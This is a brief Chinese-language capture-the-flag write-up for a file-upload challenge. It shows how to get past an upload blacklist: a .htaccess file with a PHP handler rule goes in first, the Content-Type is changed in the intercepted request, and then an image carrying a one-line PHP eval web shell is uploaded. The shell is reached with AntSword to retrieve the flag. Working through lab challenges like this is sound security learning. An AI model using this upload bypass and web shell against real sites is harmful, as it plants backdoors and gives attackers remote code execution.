打开发现文件上传
上传了一个php木马文件,发现上传失败,于是更改为图片马,但我们需要把.jpg图片内容解析为php文件,因此我们需要先上传一个.htaccess文件,.htaccess文件可以用来留后门和针对黑名单绕过,可以在.htaccess 加入php解析规则,就能够使上传的jpg/png图片以php文件执行。
先上传一个.htaccess文件,文件内容为
SetHandler application/x-httpd-php
(mac系统的.htaccess文件会被隐藏,所以我们可以先随意命名,然后通过抓包将fileame更改为.htaccess 将Content-Type:改成image/jpeg)如果不是mac直接上传.htaccess文件,但也要注意将content-type更改,并看看是否成功上传
改好后go一下,可以看见文件上传成功,然后我们继续上传图片马
内容:
<?php @eval($_POST['a']) ?>
上传成功,将路径记下来,看看是否成功
查看一下phpinfo
上传成功
蚁剑连接
拿到flag
flag{2ff15461-bd8e-4646-9dea-70789b3eeab2}